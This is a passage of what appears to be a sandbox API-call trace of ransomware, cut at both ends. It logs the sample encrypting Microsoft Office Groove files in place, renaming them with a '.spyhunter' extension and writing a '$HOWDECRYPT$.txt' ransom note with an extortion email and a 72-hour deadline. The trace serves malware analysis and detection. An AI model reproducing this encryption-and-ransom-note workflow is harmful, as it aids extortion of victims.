(HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.106] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb24*=0x7f0, lpOverlapped=0x0) returned 1 [0109.159] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.159] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb24*=0x7f0, lpOverlapped=0x0) returned 1 [0109.159] GetProcessHeap () returned 0x2c0000 [0109.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.160] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.160] WriteFile (in: hFile=0x178, lpBuffer=0x248fb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x248fb64*, lpNumberOfBytesWritten=0x248fb24*=0x4, lpOverlapped=0x0) returned 1 [0109.160] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb24*=0x30, lpOverlapped=0x0) returned 1 [0109.160] CloseHandle (hObject=0x178) returned 1 [0109.160] GetProcessHeap () returned 0x2c0000 [0109.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.160] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html.spyhunter") returned 120 [0109.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsimagetemplate.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsimagetemplate.html.spyhunter")) returned 1 [0109.161] GetProcessHeap () returned 0x2c0000 [0109.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.161] GetProcessHeap () returned 0x2c0000 [0109.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.161] GetProcessHeap () returned 0x2c0000 [0109.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21620 | out: hHeap=0x2c0000) returned 1 [0109.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb60 | out: pbBuffer=0x248fb60) returned 1 [0109.161] GetProcessHeap () returned 0x2c0000 [0109.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.162] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb58*=0x30) returned 1 [0109.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.204] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css") returned 111 [0109.205] StrStrW (lpFirst="BabyBlue.css", lpSrch=".txt") returned 0x0 [0109.205] GetProcessHeap () returned 0x2c0000 [0109.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.205] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb1c*=0x100d, lpOverlapped=0x0) returned 1 [0109.232] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffeff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.232] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x100d, lpNumberOfBytesWritten=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb1c*=0x100d, lpOverlapped=0x0) returned 1 [0109.233] GetProcessHeap () returned 0x2c0000 [0109.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.233] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.233] WriteFile (in: hFile=0x178, lpBuffer=0x248fb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x248fb5c*, lpNumberOfBytesWritten=0x248fb1c*=0x4, lpOverlapped=0x0) returned 1 [0109.233] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb1c*=0x30, lpOverlapped=0x0) returned 1 [0109.233] CloseHandle (hObject=0x178) returned 1 [0109.237] GetProcessHeap () returned 0x2c0000 [0109.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.237] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css.spyhunter") returned 121 [0109.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue.css.spyhunter")) returned 1 [0109.249] GetProcessHeap () returned 0x2c0000 [0109.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.249] GetProcessHeap () returned 0x2c0000 [0109.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.249] GetProcessHeap () returned 0x2c0000 [0109.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31aa38 | out: hHeap=0x2c0000) returned 1 [0109.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb60 | out: pbBuffer=0x248fb60) returned 1 [0109.249] GetProcessHeap () returned 0x2c0000 [0109.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb58*=0x30) returned 1 [0109.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\premium.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css") returned 110 [0109.258] StrStrW (lpFirst="Premium.css", lpSrch=".txt") returned 0x0 [0109.258] GetProcessHeap () returned 0x2c0000 [0109.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.258] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb1c*=0x706, lpOverlapped=0x0) returned 1 [0109.280] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff8fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.280] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x706, lpNumberOfBytesWritten=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb1c*=0x706, lpOverlapped=0x0) returned 1 [0109.280] GetProcessHeap () returned 0x2c0000 [0109.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.280] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.281] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x248fb5c*, lpNumberOfBytesWritten=0x248fb1c*=0x4, lpOverlapped=0x0) returned 1 [0109.281] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb1c*=0x30, lpOverlapped=0x0) returned 1 [0109.281] CloseHandle (hObject=0x16c) returned 1 [0109.294] GetProcessHeap () returned 0x2c0000 [0109.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e34b30 [0109.295] wnsprintfW (in: pszDest=0x2e34b30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css.spyhunter") returned 120 [0109.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\premium.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\premium.css.spyhunter")) returned 1 [0109.667] GetProcessHeap () returned 0x2c0000 [0109.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e34b30 | out: hHeap=0x2c0000) returned 1 [0109.667] GetProcessHeap () returned 0x2c0000 [0109.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.667] GetProcessHeap () returned 0x2c0000 [0109.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21e38 | out: hHeap=0x2c0000) returned 1 [0109.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb58 | out: pbBuffer=0x248fb58) returned 1 [0109.668] GetProcessHeap () returned 0x2c0000 [0109.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb50*=0x30) returned 1 [0109.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF") returned 119 [0109.679] StrStrW (lpFirst="TAB_OFF.GIF", lpSrch=".txt") returned 0x0 [0109.680] GetProcessHeap () returned 0x2c0000 [0109.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.680] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb14*=0x155, lpOverlapped=0x0) returned 1 [0109.681] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffeab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.681] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x155, lpNumberOfBytesWritten=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb14*=0x155, lpOverlapped=0x0) returned 1 [0109.681] GetProcessHeap () returned 0x2c0000 [0109.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.681] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.681] WriteFile (in: hFile=0x178, lpBuffer=0x248fb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x248fb54*, lpNumberOfBytesWritten=0x248fb14*=0x4, lpOverlapped=0x0) returned 1 [0109.681] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb14*=0x30, lpOverlapped=0x0) returned 1 [0109.681] CloseHandle (hObject=0x178) returned 1 [0109.682] GetProcessHeap () returned 0x2c0000 [0109.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0109.682] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF.spyhunter") returned 129 [0109.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_off.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_OFF.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_off.gif.spyhunter")) returned 1 [0109.682] GetProcessHeap () returned 0x2c0000 [0109.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0109.682] GetProcessHeap () returned 0x2c0000 [0109.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.682] GetProcessHeap () returned 0x2c0000 [0109.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b220 | out: hHeap=0x2c0000) returned 1 [0109.683] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb58 | out: pbBuffer=0x248fb58) returned 1 [0109.683] GetProcessHeap () returned 0x2c0000 [0109.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb50*=0x30) returned 1 [0109.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css") returned 114 [0109.683] StrStrW (lpFirst="SpringGreen.css", lpSrch=".txt") returned 0x0 [0109.683] GetProcessHeap () returned 0x2c0000 [0109.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.684] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb14*=0xfd0, lpOverlapped=0x0) returned 1 [0109.716] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff030, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.716] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb14*=0xfd0, lpOverlapped=0x0) returned 1 [0109.716] GetProcessHeap () returned 0x2c0000 [0109.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.716] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.716] WriteFile (in: hFile=0x178, lpBuffer=0x248fb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x248fb54*, lpNumberOfBytesWritten=0x248fb14*=0x4, lpOverlapped=0x0) returned 1 [0109.716] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb14*=0x30, lpOverlapped=0x0) returned 1 [0109.716] CloseHandle (hObject=0x178) returned 1 [0109.717] GetProcessHeap () returned 0x2c0000 [0109.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.717] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css.spyhunter") returned 124 [0109.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen.css.spyhunter")) returned 1 [0109.717] GetProcessHeap () returned 0x2c0000 [0109.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.718] GetProcessHeap () returned 0x2c0000 [0109.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.718] GetProcessHeap () returned 0x2c0000 [0109.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31be50 | out: hHeap=0x2c0000) returned 1 [0109.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.718] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0109.718] WriteFile (in: hFile=0x178, lpBuffer=0x248fa87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fbb0, lpOverlapped=0x0 | out: lpBuffer=0x248fa87*, lpNumberOfBytesWritten=0x248fbb0*=0x127, lpOverlapped=0x0) returned 1 [0109.719] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0109.719] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fbb0*=0x2ac, lpOverlapped=0x0) returned 1 [0109.719] CloseHandle (hObject=0x178) returned 1 [0109.720] GetProcessHeap () returned 0x2c0000 [0109.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e33e70 | out: hHeap=0x2c0000) returned 1 [0109.720] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb50 | out: pbBuffer=0x248fb50) returned 1 [0109.720] GetProcessHeap () returned 0x2c0000 [0109.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.720] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb48*=0x30) returned 1 [0109.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.720] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF") returned 115 [0109.720] StrStrW (lpFirst="TAB_ON.GIF", lpSrch=".txt") returned 0x0 [0109.720] GetProcessHeap () returned 0x2c0000 [0109.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.721] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb0c*=0x16c, lpOverlapped=0x0) returned 1 [0109.722] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe94, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.722] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x248fb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb0c*=0x16c, lpOverlapped=0x0) returned 1 [0109.722] GetProcessHeap () returned 0x2c0000 [0109.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.722] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.722] WriteFile (in: hFile=0x178, lpBuffer=0x248fb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb0c, lpOverlapped=0x0 | out: lpBuffer=0x248fb4c*, lpNumberOfBytesWritten=0x248fb0c*=0x4, lpOverlapped=0x0) returned 1 [0109.722] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb0c*=0x30, lpOverlapped=0x0) returned 1 